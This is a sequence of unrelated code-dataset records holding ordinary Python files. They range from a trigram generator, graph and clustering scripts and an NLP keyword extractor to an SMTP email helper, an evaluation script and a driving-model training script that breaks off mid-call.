by adding the last word to the list.\n        buildup_text.append(three_words_list[2])\n\n        # dictionary keys can only be hashable types (string, number, tuple),\n        # so convert the list to a tuple for the dictionary key\n        random_key = tuple(last_two_words)\n\n    print(f\"-- Can't find the key {random_key}.--\")\n    #print(f\"-- New text --\")\n    #print(f\"{buildup_text}\")\n\n","sub_path":"students/zhen_yang/lesson04/trigrams.py","file_name":"trigrams.py","file_ext":"py","file_size_in_byte":4321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"403542233","text":"import itertools\n\nN, K = map(int, input().split())\nans = []\nfor i in range(2, N + 1):\n    ans.append([1, i])\n\n\"\"\"\nThe total number of pairs is N_C_2.\nBuild a star graph centered on vertex 1.\nThe pairs among 2,3,...,N number N-1_C_2, and each such pair is at distance 2.\nIf we add (N-1_C_2 - K) edges among 2,3,...,N,\nexactly K pairs at distance 2 remain.\n\nWhen N-1_C_2 - K < 0, construction is impossible.\n\"\"\"\n\nif (N - 1) * (N - 2) // 2 - K < 0:\n    print(-1)\n    exit()\nelse:\n    comb
= list(itertools.combinations(range(2, N + 1), 2))\n for i in range((N - 1) * (N - 2) // 2 - K):\n u = comb[i][0]\n v = comb[i][1]\n ans.append([u, v])\n print(len(ans))\n for i in ans:\n print(*i)\n","sub_path":"Python_codes/p02997/s223603693.py","file_name":"s223603693.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"464436582","text":"from sklearn.feature_extraction.text import CountVectorizer\nimport spacy\nfrom transformers import AutoModel, AutoTokenizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sentence_transformers import SentenceTransformer\nimport json\nimport schedule\nimport time\n\ndef get_keywords(text: str):\n # n_gram = keyword where n_gram_range = (lower boundary of number of words, upper boundary)\n n_gram_range = (2, 4)\n\n # stop words are words that are presumed to be uniformative, ex. \"like\", \"him\", \"the\"\n stop_words = \"english\"\n\n # Extract candidate words/phrases\n # CountVectorizer is a sklearn function that converts words to vectors as per the Bag of Words analogy (frequency of words in text)\n count = CountVectorizer(ngram_range=n_gram_range,\n stop_words=stop_words).fit([text])\n all_candidates = count.get_feature_names()\n\n # FINDING NOUNS\n\n # Load the Spacy model for NLP\n nlp = spacy.load('en_core_web_sm')\n doc = nlp(text)\n\n # Create a set for noun chunks (base noun phrases) within the doc\n # Uses the spacy built-in models to find noun chunks\n noun_phrases = set(chunk.text.strip().lower() for chunk in doc.noun_chunks)\n\n # Create an empty set (for nouns within in the text), only want unique values\n nouns = set()\n # doc refers to the text\n # Uses spacy model to determine whether word is noun and add to noun set\n for token in doc:\n if token.pos_ == \"NOUN\":\n nouns.add(token.text)\n\n # Joins the noun and noun_phrases set into an all_nouns set\n all_nouns = nouns.union(noun_phrases)\n\n # Filter for candidate that are in both all_nouns and all_candidates, add to list candidates\n candidates = list(\n filter(lambda candidate: candidate in all_nouns, all_candidates))\n\n # CALCULATING BEST KEYWORDS\n\n # Defining the BERT NLP Embedding model used\n # Encodes each word as a specific vector in relation to other words, values are determined through semantics learned by the BERT model\n model = SentenceTransformer('distilbert-base-nli-mean-tokens')\n text_embedding = model.encode([doc])\n candidate_embeddings = model.encode(candidates)\n\n # Use cosine similarity between text and candidate to determine proximity, and therefore top candidates\n # Generate top 5 keywords\n top_k = 1\n distances = cosine_similarity(text_embedding, candidate_embeddings)\n keywords = [candidates[index] for index in distances.argsort()[0][-top_k:]]\n\n print(keywords)\n return keywords\n","sub_path":"Main/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"228161361","text":"from typing import Any\n\nimport proto\n\nclass AdCustomizerPlaceholderFieldEnum(proto.Message):\n class AdCustomizerPlaceholderField(proto.Enum):\n UNSPECIFIED = 0\n UNKNOWN = 1\n INTEGER = 2\n PRICE = 3\n DATE = 4\n STRING = 5\n def __init__(\n self,\n mapping: Any | None = ...,\n *,\n ignore_unknown_fields: bool = ...,\n ) -> None: 
...\n","sub_path":"google-stubs/ads/googleads/v12/enums/types/ad_customizer_placeholder_field.pyi","file_name":"ad_customizer_placeholder_field.pyi","file_ext":"pyi","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"114630031","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn import cluster\r\nfrom sklearn import metrics\r\nfrom sklearn import neighbors\r\nimport pysal as ps\r\n\r\n## k nearest neighbors demo\r\ndat=pd.read_csv('../data/trt_coords.csv',index_col=0)\r\ndist=metrics.pairwise.pairwise_distances(dat.ix[:,['X1','X2']])\r\n\r\n## Connectivity - from spatial weights\r\nwknn=ps.knnW_from_shapefile('../data/trt_test.shp',k=4) # version with rikers removed\r\nconn_sp=wknn.full()[0]\r\n\r\n# wqn=ps.queen_from_shapefile('../data/trt_test.shp') # version with rikers removed\r\n# conn_sp=wqn.full()[0]\r\n\r\n## Connectivity - from borough membership\r\ncy=dat.County\r\ncy[(cy==47) | (cy==81)]=4781\r\ncy=cy.values\r\n\r\nconn=np.zeros((len(cy),len(cy)))\r\n\r\nfor r in range(len(conn)):\r\n conn[r,np.where(cy==cy[r])]=1\r\n\r\n## Connectivity - combined\r\nconn=conn*conn_sp\r\n\r\n## Regionalization\r\nnp.random.seed(830308)\r\nclust=cluster.AgglomerativeClustering(n_clusters=9,connectivity=conn,linkage='ward')\r\nfit=clust.fit(dist)\r\npd.DataFrame({'GEOID':dat.GEOID,'cluster':fit.labels_}).to_csv('../data/reg_test.csv')\r\n","sub_path":"code/build_regions.py","file_name":"build_regions.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"162756161","text":"import numpy as np\nimport MDAnalysis\nimport matplotlib.pyplot as plt\nimport math\n\nu = MDAnalysis.Universe('longrun.tpr', 'longrun.xtc')\ntpr_resid_from_one=False\nprint(u)\n#------FUNCTIONS----------\n\n# read file data into a 2-d array\ndef get_file_string_array(file_name):\n try:\n file = open(file_name, \"r\")\n except IOError:\n print('Error: file (%s) not found!\\n' % (file_name))\n sys.exit()\n lines = file.readlines()\n file.close()\n array = []\n for line in lines:\n array.append(line.split())\n return array\n\n# Get blocks of data by their name\ndef get_blocks(array, block):\n bl = []\n for i in range(len(array)):\n if ((len(array[i]) == 3) and (array[i][1] == block)):\n a = i + 1; break\n print('(%s) opening index: (%s)' % (block, a))\n for i in range(a, len(array)):\n if (not array[i]):\n b = i\n break\n print('(%s) closing index: (%s)' % (block, b))\n for i in range(a,b):\n bl.append(array[i])\n return bl\n\n#Get distance between two atoms\ndef distance(ind1, ind2): #gets index list starting from 1, gives d for index list starting from 0!\n ind1 = ind1 - 1\n ind2 = ind2 - 1\n atom1 = u.select_atoms('index '+str(ind1))\n atom2 = u.select_atoms('index '+str(ind2))\n delta = atom2.positions[0]-atom1.positions[0]\n r12 = math.sqrt(delta[0]**2+delta[1]**2+delta[2]**2)\n return r12\n\n#Count contacts in one frame\ndef count_contacts():\n n = 0\n for i in range(len(contacts)):\n ind1 = int(contacts[i][0]); ind2 = int(contacts[i][1])\n if distance(ind1, ind2)/10 < 2*(float(contacts[i][3])):\n n += 1\n return n\n\n#calculates sigma from d\ndef get_const(ind1, ind2):\n sigma = distance(ind1, ind2)/((2)**(1/6))\n #C6 = 4*9.414*sigma**6; C12 = 4*9.414*sigma**12\n #return C6, C12\n return sigma\n\n#------------------MAIN----------------------------\n\npairs_array = get_file_string_array('Protein_A.itp')\ncontacts = get_blocks(pairs_array, 
'pairs')\n\n\ntime = []\ncontacts_trj = []\n\nfor tes in u.trajectory:\n contacts_trj.append(count_contacts())\n time.append(u.trajectory.time/1000)\n\n\nfig, ax = plt.subplots()\n\nax.plot(time, contacts_trj, '--', color='black', linewidth=2)\nax.spines['right'].set_visible(False)\nax.spines['top'].set_visible(False)\nax.spines['left'].set_linewidth(2)\nax.spines['bottom'].set_linewidth(2)\nax.tick_params(width=3, labelsize=13)\nfig.savefig(\"plot.png\", format='png', dpi=600)\nprint('plot.png saved to working directory')\n","sub_path":"show_contacts.py","file_name":"show_contacts.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"650792004","text":"from Dungeon import Dungeon\nfrom Commands import Command\n\n\n\nclass SUD:\n def __init__(self):\n self.myDungeon = 0\n self.commands = 0\n\n def Run(self):\n self.myDungeon = Dungeon()\n self.commands = Command()\n self.myDungeon.Init()\n\n while True:\n self.Process()\n\n def Process(self):\n self.myDungeon.DisplayCurrentRoom()\n\n key = input(\"-\")\n\n user_input = key.split(' ')\n\n user_input = [x for x in user_input if x != '']\n\n if user_input[0].lower() == 'help':\n print(\"HELP!!\")\n elif user_input[0].lower() == 'go':\n if self.myDungeon.isValidMove(user_input[1].lower()):\n self.myDungeon.Move(user_input[1].lower())\n else:\n self.handleBadInput()\n else:\n self.handleBadInput()\n\n def handleBadInput(self):\n print(\"\\nERROR\")\n print(\"Press any key to continue\")\n input()\n\n\nif __name__ == '__main__':\n sud = SUD()\n sud.Run()\n","sub_path":"MUD/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"570552692","text":"# coding: utf-8\n\nimport six\n\nfrom huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization\n\n\nclass CreateTestCaseRequestBody:\n\n \"\"\"\n Attributes:\n openapi_types (dict): The key is attribute name\n and the value is attribute type.\n attribute_map (dict): The key is attribute name\n and the value is json key in definition.\n \"\"\"\n sensitive_list = []\n\n openapi_types = {\n 'name': 'str',\n 'service_id': 'int',\n 'rank_id': 'str',\n 'testcase_number': 'str',\n 'extend_info': 'ExternalServiceCaseInfo'\n }\n\n attribute_map = {\n 'name': 'name',\n 'service_id': 'service_id',\n 'rank_id': 'rank_id',\n 'testcase_number': 'testcase_number',\n 'extend_info': 'extend_info'\n }\n\n def __init__(self, name=None, service_id=None, rank_id=None, testcase_number=None, extend_info=None):\n \"\"\"CreateTestCaseRequestBody\n\n The model defined in huaweicloud sdk\n\n :param name: 页面上显示的用例名称,长度为[3-128]位字符\n :type name: str\n :param service_id: 该值由注册接口返回,取值范围为10-9999\n :type service_id: int\n :param rank_id: 测试用例等级,可选值为[0,1,2,3,4],不填时默认为2\n :type rank_id: str\n :param testcase_number: 用例编号,不填该值时会自动生成,长度为[3-128]位字符\n :type testcase_number: str\n :param extend_info: \n :type extend_info: :class:`huaweicloudsdkcloudtest.v1.ExternalServiceCaseInfo`\n \"\"\"\n \n \n\n self._name = None\n self._service_id = None\n self._rank_id = None\n self._testcase_number = None\n self._extend_info = None\n self.discriminator = None\n\n self.name = name\n self.service_id = service_id\n if rank_id is not None:\n self.rank_id = rank_id\n if testcase_number is not None:\n self.testcase_number = testcase_number\n if extend_info is not None:\n self.extend_info = extend_info\n\n @property\n def 
name(self):\n \"\"\"Gets the name of this CreateTestCaseRequestBody.\n\n 页面上显示的用例名称,长度为[3-128]位字符\n\n :return: The name of this CreateTestCaseRequestBody.\n :rtype: str\n \"\"\"\n return self._name\n\n @name.setter\n def name(self, name):\n \"\"\"Sets the name of this CreateTestCaseRequestBody.\n\n 页面上显示的用例名称,长度为[3-128]位字符\n\n :param name: The name of this CreateTestCaseRequestBody.\n :type name: str\n \"\"\"\n self._name = name\n\n @property\n def service_id(self):\n \"\"\"Gets the service_id of this CreateTestCaseRequestBody.\n\n 该值由注册接口返回,取值范围为10-9999\n\n :return: The service_id of this CreateTestCaseRequestBody.\n :rtype: int\n \"\"\"\n return self._service_id\n\n @service_id.setter\n def service_id(self, service_id):\n \"\"\"Sets the service_id of this CreateTestCaseRequestBody.\n\n 该值由注册接口返回,取值范围为10-9999\n\n :param service_id: The service_id of this CreateTestCaseRequestBody.\n :type service_id: int\n \"\"\"\n self._service_id = service_id\n\n @property\n def rank_id(self):\n \"\"\"Gets the rank_id of this CreateTestCaseRequestBody.\n\n 测试用例等级,可选值为[0,1,2,3,4],不填时默认为2\n\n :return: The rank_id of this CreateTestCaseRequestBody.\n :rtype: str\n \"\"\"\n return self._rank_id\n\n @rank_id.setter\n def rank_id(self, rank_id):\n \"\"\"Sets the rank_id of this CreateTestCaseRequestBody.\n\n 测试用例等级,可选值为[0,1,2,3,4],不填时默认为2\n\n :param rank_id: The rank_id of this CreateTestCaseRequestBody.\n :type rank_id: str\n \"\"\"\n self._rank_id = rank_id\n\n @property\n def testcase_number(self):\n \"\"\"Gets the testcase_number of this CreateTestCaseRequestBody.\n\n 用例编号,不填该值时会自动生成,长度为[3-128]位字符\n\n :return: The testcase_number of this CreateTestCaseRequestBody.\n :rtype: str\n \"\"\"\n return self._testcase_number\n\n @testcase_number.setter\n def testcase_number(self, testcase_number):\n \"\"\"Sets the testcase_number of this CreateTestCaseRequestBody.\n\n 用例编号,不填该值时会自动生成,长度为[3-128]位字符\n\n :param testcase_number: The testcase_number of this CreateTestCaseRequestBody.\n :type testcase_number: str\n \"\"\"\n self._testcase_number = testcase_number\n\n @property\n def extend_info(self):\n \"\"\"Gets the extend_info of this CreateTestCaseRequestBody.\n\n :return: The extend_info of this CreateTestCaseRequestBody.\n :rtype: :class:`huaweicloudsdkcloudtest.v1.ExternalServiceCaseInfo`\n \"\"\"\n return self._extend_info\n\n @extend_info.setter\n def extend_info(self, extend_info):\n \"\"\"Sets the extend_info of this CreateTestCaseRequestBody.\n\n :param extend_info: The extend_info of this CreateTestCaseRequestBody.\n :type extend_info: :class:`huaweicloudsdkcloudtest.v1.ExternalServiceCaseInfo`\n \"\"\"\n self._extend_info = extend_info\n\n def to_dict(self):\n \"\"\"Returns the model properties as a dict\"\"\"\n result = {}\n\n for attr, _ in six.iteritems(self.openapi_types):\n value = getattr(self, attr)\n if isinstance(value, list):\n result[attr] = list(map(\n lambda x: x.to_dict() if hasattr(x, \"to_dict\") else x,\n value\n ))\n elif hasattr(value, \"to_dict\"):\n result[attr] = value.to_dict()\n elif isinstance(value, dict):\n result[attr] = dict(map(\n lambda item: (item[0], item[1].to_dict())\n if hasattr(item[1], \"to_dict\") else item,\n value.items()\n ))\n else:\n if attr in self.sensitive_list:\n result[attr] = \"****\"\n else:\n result[attr] = value\n\n return result\n\n def to_str(self):\n \"\"\"Returns the string representation of the model\"\"\"\n import simplejson as json\n if six.PY2:\n import sys\n reload(sys)\n sys.setdefaultencoding(\"utf-8\")\n return 
json.dumps(sanitize_for_serialization(self), ensure_ascii=False)\n\n def __repr__(self):\n \"\"\"For `print`\"\"\"\n return self.to_str()\n\n def __eq__(self, other):\n \"\"\"Returns true if both objects are equal\"\"\"\n if not isinstance(other, CreateTestCaseRequestBody):\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n \"\"\"Returns true if both objects are not equal\"\"\"\n return not self == other\n","sub_path":"huaweicloud-sdk-cloudtest/huaweicloudsdkcloudtest/v1/model/create_test_case_request_body.py","file_name":"create_test_case_request_body.py","file_ext":"py","file_size_in_byte":7066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"11577084","text":"#!/usr/bin/python\n\nimport argparse\nimport glob\nimport re\nimport numpy as np\nfrom collections import defaultdict\nimport ipdb\n\ndef recog_file(filename, ground_truth_path, stats, exclude_bg=False):\n\n # read ground truth\n gt_file = ground_truth_path + re.sub('.*/','/',filename) + '.txt'\n with open(gt_file, 'r') as f:\n ground_truth = f.read().split('\\n')[0:-1]\n f.close()\n # read recognized sequence\n with open(filename, 'r') as f:\n recognized = f.read().split(' ')\n # recognized = # framelevel recognition is in 6-th line of file\n f.close()\n\n # print('recognized', len(recognized), 'groundtruth', len(ground_truth))\n\n n_frame_errors = 0\n for i in range(len(recognized)):\n if ground_truth[i] == \"SIL\" and exclude_bg:\n continue\n if not recognized[i] == ground_truth[i]:\n n_frame_errors += 1\n\n ground_truth = np.array(ground_truth)\n recognized = np.array(recognized)\n\n unique = set(np.unique(ground_truth)).union(set(np.unique(recognized)))\n for i in unique:\n if exclude_bg and i == \"SIL\":\n continue\n\n recog_mask = recognized == i\n gt_mask = ground_truth == i\n union = np.logical_or(recog_mask, gt_mask).sum()\n intersect = np.logical_and(recog_mask, gt_mask).sum() # num of correct prediction\n\n stats[i][0] = stats[i][0] + intersect\n stats[i][1] = stats[i][1] + recog_mask.sum()\n stats[i][2] = stats[i][2] + gt_mask.sum()\n stats[i][3] = stats[i][3] + union\n\n return n_frame_errors, len(recognized)\n\n\n### MAIN #######################################################################\n\n### arguments ###\n### --recog_dir: the directory where the recognition files from inferency.py are placed\n### --ground_truth_dir: the directory where the framelevel ground truth can be found\nparser = argparse.ArgumentParser()\nparser.add_argument('--recog_dir', required=True)\nparser.add_argument('--ground_truth_dir', required=True)\nparser.add_argument('--exclude_bg', action=\"store_true\")\nargs = parser.parse_args()\n\nfilelist = glob.glob(args.recog_dir + '/*')\n# filelist = [ f for f in filelist if \"action\" not in f ]\n\nprint('RECOG', args.recog_dir, '\\nGT', args.ground_truth_dir)\n\nprint('Evaluate %d video files...' 
% len(filelist))\n\nn_frames = 0\nn_errors = 0\nstats = defaultdict(lambda : [0, 0, 0, 0])\n# loop over all recognition files and evaluate the frame error\nfor filename in filelist:\n errors, frames = recog_file(filename, args.ground_truth_dir, stats, args.exclude_bg)\n n_errors += errors\n n_frames += frames\n\n\nP = np.array([ s[0] / s[1] for s in stats.values() ])\nR = np.array([ s[0] / s[2] for s in stats.values() ])\nP[np.isnan(P)] = 0\nR[np.isnan(R)] = 0\nF = (2*P*R)/(P+R+1e-6)\nJaccard = [ s[0] / s[3] for s in stats.values() ]\nprint('frame accuracy: %f' % (1.0 - float(n_errors) / n_frames))\nprint('number total frames: %d' % (n_frames))\nprint(\"P %.4f R %.4f F1 %.4f\" % (np.mean(P), np.mean(R), np.mean(F)))\nprint(\"Jaccard %.4f\" % np.mean(Jaccard) )\n\n","sub_path":"full_eval.py","file_name":"full_eval.py","file_ext":"py","file_size_in_byte":3037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"151330847","text":"# Printing all the characters that match the \\d regex. \n# It is ways beyond the regular 0-9 from the ASCII table.\n\nimport re\n\nfor i in range(32, 10_000):\n ch = chr(i)\n # Use the re.ASCII flag to limit the \\d to 0-9 only\n if re.match('\\d', ch, re.ASCII):\n print(ch, end='')\nprint('')\n\nfor i in range(32, 10_000):\n ch = chr(i)\n if re.match('[$.0-9A-Za-z[]', ch, re.ASCII):\n print(ch, end='')\nprint('')\n\nfor i in range(32, 256):\n ch = chr(i)\n if re.match('[^a-zA-Z]', ch):\n print(ch, end='')\nprint('')\n","sub_path":"day4/16-digits.py","file_name":"16-digits.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"59289781","text":"import smtplib\nimport mimetypes\nimport email\nimport email.mime.text\nimport email.mime.application\nimport email.mime.multipart\n\nclass EmailClient:\n \"\"\"A simple email client class\"\"\"\n\n def __init__(self, host, port, usr, pwd):\n self.host = host\n self.port = port\n self.usr = usr\n self.pwd = pwd\n\n def sendpdf(self, subject, body, to_addr, filepath):\n response=''\n server=''\n msg = email.mime.multipart.MIMEMultipart()\n msg['Subject'] = subject\n msg['From'] = self.usr\n msg['To'] = to_addr\n msg.attach(email.mime.text.MIMEText(body))\n fp=open(filepath,'rb')\n att = email.mime.application.MIMEApplication(fp.read(),_subtype=\"pdf\")\n fp.close()\n att.add_header('Content-Disposition','attachment',filename='Franc-debitorder-mandate.pdf')\n msg.attach(att)\n try: \n server = smtplib.SMTP_SSL(self.host,self.port)\n server.login(self.usr,self.pwd) \n result = server.sendmail(self.usr, to_addr, msg.as_string())\n print('SENDPDF Success')\n response = {'status':1,'message':'Sent','details':result}\n except Exception as ex:\n err = \"SENDPDF ERROR: {0}\".format(ex)\n print(err)\n response = {'status':0,'message':'Error','details':err}\n finally:\n if (server):\n server.quit()\n # print(response)\n return response\n\n def sendemail(self, subject, msg, to_addr):\n response=''\n server=''\n header = 'From: {0}\\n'.format(self.usr)\n header += 'To: {0}\\n'.format(to_addr)\n header += 'Subject: {0}\\n\\n'.format(subject)\n try: \n # msg = msg.replace( u'\\u2018', u\"'\") \n # msg = msg.replace( u'\\u2013', u\"'\")\n # msg = msg.replace( u'\\u2019', u\"'\") \n # msg = msg.replace( u'\\u201c', u'\"') \n # msg = msg.replace( u'\\u201d', u'\"') \n msg.encode('ascii')\n message = header + msg\n server = smtplib.SMTP_SSL(self.host,self.port)\n server.login(self.usr,self.pwd) \n 
result = server.sendmail(self.usr, to_addr, message)\n            response = {'status':1,'message':'Sent','details':to_addr}\n        except Exception as ex:\n            err = \"ERROR: {0}\".format(ex)\n            response = {'status':0,'message':'Error','details':err}\n        finally:\n            if (server):\n                server.quit()\n        # print(response)\n        return response\n\n    def payment(self, result, amount, frequency):\n        response=''\n        server=''\n        to_addr = result['email']  # recipient address from the stored user record\n        header = 'From: {0}\\n'.format(self.usr)\n        header += 'To: {0}\\n'.format(to_addr)\n        header += 'Subject: Franc: Payment instructions\\n\\n'\n        try:\n            body = \"Hi {0},\\n\\nWell done on investing R {1} on a {2} basis with Franc!\\n\\n\" \\\n                \"Using your banking app or online banking portal set up a payment with the following details:\\n\\n\" \\\n                \"\\t Recipient: {3}\\n\" \\\n                \"\\t Bank: {4}\\n\" \\\n                \"\\t Account: {5}\\n\" \\\n                \"\\t Branch: {6}\\n\" \\\n                \"\\t Reference: {7}\\n\" \\\n                \"\\t Amount: {1}\\n\" \\\n                \"\\t Frequency: {2}\\n\\n\" \\\n                \"As soon as we receive your payment with reference {7} we will let you know. \" \\\n                \"You can check the status of your contribution via the Franc app.\\nKeep Saving,\\nFranc\".format(\n                    result['firstname'], amount, frequency, result['label'],\n                    result['bank'], result['accno'], result['branch'],\n                    result['promocode'])\n            body.encode('ascii')\n            message = header + body\n            server = smtplib.SMTP_SSL(self.host,self.port)\n            server.login(self.usr,self.pwd)\n            server.sendmail(self.usr, to_addr, message)\n            response = {'status':1,'message':'Sent','details':to_addr}\n        except Exception as ex:\n            err = \"ERROR: {0}\".format(ex)\n            response = {'status':0,'message':'Error','details':err}\n        finally:\n            if (server):\n                server.quit()\n        return response\n","sub_path":"server/emailclient.py","file_name":"emailclient.py","file_ext":"py","file_size_in_byte":4310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
{"seq_id":"487398606","text":"# Challenge: Modules, Classes, Error Handling, and List Comprehensions\n# https://www.dataquest.io/mission/187/challenge-modules-classes-error-handling-and-list-comprehensions\n\n# 2\nimport csv\n# open and read in the data\nf = open(\"nfl-suspensions-data.csv\", \"r\")\nnfl_suspensions = list(csv.reader(f))\n# cut off the file header\nnfl_suspensions = nfl_suspensions[1:]\n# analyze the frequency of the years\nyears = {}\nfor row in nfl_suspensions:\n    row_year = row[5]\n    if row_year in years:\n        years[row_year] += 1\n    else:\n        years[row_year] = 1\nprint(years)\n\n# 3\n# find unique teams\nteam_list = []\nfor row in nfl_suspensions:\n    row_team = row[1]\n    team_list.append(row_team)\nunique_teams = set(team_list)\n# find unique games as list comprehension\ngames_list = [row[2] for row in nfl_suspensions]\nunique_games = set(games_list)\n# print both unique sets\nprint(unique_teams)\nprint(unique_games)\n\n\n# 4\n'''\n# Suspension class to represent each NFL suspension\nclass Suspension():\n    def __init__(self,row):\n        self.name = row[0]\n        self.team = row[1]\n        self.games = row[2]\n        self.year = row[5]\n# create class instance: Classcall(dateiname[zeilenposition])\nthird_suspension = Suspension(nfl_suspensions[3])\n'''\n\n# 5\n# tweaking of the Suspension class for error handling and extended functionality\nclass Suspension():\n    def __init__(self,row):\n        self.name = row[0]\n        self.team = row[1]\n        self.games = row[2]\n        try:\n            self.year = int(row[5])\n        except Exception:\n            self.year = 0\n    # create method\n    def get_year(self):\n        return self.year\n\n# create class instance: 
Classcall(dateiname[zeilenposition])\nmissing_year = Suspension(nfl_suspensions[22])\ntwenty_third_year = missing_year.get_year()","sub_path":"m187/m187.py","file_name":"m187.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"543426965","text":"participents = {\n 'Martin': {'year': 1976, 'height': 180, 'education': ['VS', 'Gym', 'Uni']},\n 'Harald': 1970,\n 'Gerald': 1973,\n 'RolandW': 1998,\n 'Christoph': 1981,\n 'RolandS': {'year': 1974, 'education': ['VS', 'Gym', 'Uni']},\n}\n\nfor name in participents:\n print(participents[name])\n\nfor name, data in participents.items():\n print(name, data)\n ","sub_path":"iterate-dict.py","file_name":"iterate-dict.py","file_ext":"py","file_size_in_byte":394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"333279077","text":"# coding=utf-8\n\"\"\"\nLorum ipsum\n\nUsage:\n status_all_git_folders1.py [options] \n\nOptions:\n -h --help Show this screen.\n\nauthor : rabshakeh (erik@a8.nl)\nproject : git_utils\ncreated : 04-06-15 / 14:32\n\"\"\"\nfrom arguments import Arguments\n\n\ndef main():\n \"\"\"\n main\n \"\"\"\n arguments = Arguments(__doc__)\n print(arguments)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"status_all_git_folders1.py","file_name":"status_all_git_folders1.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"399012939","text":"import csv\nimport numpy as np\nimport cv2\nimport pickle\nimport joblib\nimport os\nfrom random import shuffle\nimport sklearn\n\n\ndef generator(samples, batch_size=32):\n num_samples = len(samples)\n while 1: # Loop forever so the generator never terminates\n shuffle(samples)\n batch_size = int(batch_size / 6)\n for offset in range(0, num_samples, batch_size):\n batch_samples = samples[offset:offset+batch_size]\n images = []\n angles = []\n for batch_sample in batch_samples:\n for i in range(3):\n source_path = batch_sample[i].strip()\n filename = source_path.split('/')[-1]\n current_path = 'data/IMG/' + filename\n im_cv = cv2.imread(current_path)\n im_rgb = cv2.cvtColor(im_cv, cv2.COLOR_BGR2RGB)\n # im_rgb = im_cv\n # Crop image\n # image = image[60:140,:,:]\n # Normalize image\n # image = image.astype('float32')\n # image = image / 255.0 - 0.5\n measurement = float(batch_sample[3])\n if i == 1:\n measurement += 0.2\n elif i == 2:\n measurement -= 0.2\n images.append(im_rgb)\n angles.append(measurement)\n images.append(cv2.flip(im_rgb, 1))\n angles.append(measurement*-1.0)\n X_train = np.array(images)\n y_train = np.array(angles)\n yield sklearn.utils.shuffle(X_train, y_train)\n\n# if os.path.exists(\"training_data.p\"):\n# print(\"Training data is dumped already\")\n# training_data = joblib.load(\"training_data.p\", mmap_mode=None)\n# X_train, y_train = training_data\n# else:\nlines = []\nwith open('data/driving_log.csv') as csvfile:\n reader = csv.reader(csvfile)\n for line in reader:\n lines.append(line)\n\nfor i in range(10):\n print(\"First line of csv file\", lines[i])\n# lines.pop(0)\n# print(\"after\", lines[0])\n\nfrom sklearn.model_selection import train_test_split\ntrain_samples, validation_samples = train_test_split(lines, test_size=0.2)\n\n# print(\"current_path\", current_path)\n# joblib.dump(training_data, \"training_data.p\")\n\n# Set our batch size\nbatch_size=32\n# compile and train the model using the generator 
function\ntrain_generator = generator(train_samples, batch_size=batch_size)\nvalidation_generator = generator(validation_samples, batch_size=batch_size)\n\n\nfrom keras.layers import Input, Lambda, Cropping2D, Dense, GlobalAveragePooling2D, Flatten\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.models import Model\nimport tensorflow as tf\n\n\nsize_cropped = 90\n# Using Inception with ImageNet pre-trained weights\ninception = InceptionV3(weights='imagenet', include_top=False,\n input_shape=(size_cropped, 320, 3))\n# Freeze what already trained\nfor layer in inception.layers:\n layer.trainable = False\n\n# Input layer\n# image_input = Input(shape=(160, 320, 3))\nimage_input = Input(shape=(160, 320, 3))\n\n# Cropping layer\ncropped_input = Cropping2D(cropping=((50,20), (0,0)), input_shape=(160,320,3))(image_input)\n\n# Lambda layer (normalization)\nresized_input = Lambda(lambda pixel: (pixel / 255.0 - 0.5)*2.0, input_shape=(size_cropped,320,3))(cropped_input)\n\n# Inception V3 layers\ninp = inception(resized_input)\n\n\n# Global average pooling layer\nglob_avg_pool = GlobalAveragePooling2D()(inp)\n# glob_avg_pool = inp\n\n# Fully connected layer\n# Activation should be None, otherwise no negative steering values will be allowed\nDense_layer1 = Dense(100, activation='relu' )(glob_avg_pool)\n\nDense_layer2 = Dense(50, activation='relu' )(Dense_layer1)\n\nDense_layer3 = Dense(10, activation='relu' )(Dense_layer2)\n\n# Dense_layer1 = Dense(100 )(glob_avg_pool)\n#\n# Dense_layer2 = Dense(50)(Dense_layer1)\n#\n# Dense_layer3 = Dense(10)(Dense_layer2)\n\n# Output layer (fully connected layer)\npredictions = Dense(1, activation=None)(Dense_layer3)\n\n# model = Model(inputs=inception_input, outputs=predictions)\nmodel = Model(inputs=image_input, outputs=predictions)\n\n# Configure the model\nmodel.compile(optimizer='adam', loss='mse')\n\nprint(model.summary())\n# print(inception.summary())\n\n\nfrom keras.callbacks.callbacks import ModelCheckpoint, EarlyStopping\n# checkpoint = ModelCheckpoint(filepath='model.h5', monitor='val_loss', save_best_only=True)\n# stopper = EarlyStopping(monitor='val_accuracy', min_delta=0.0003, patience=5)\nfrom math import ceil\nhistory_object = model.fit_generator(train_generator,\n 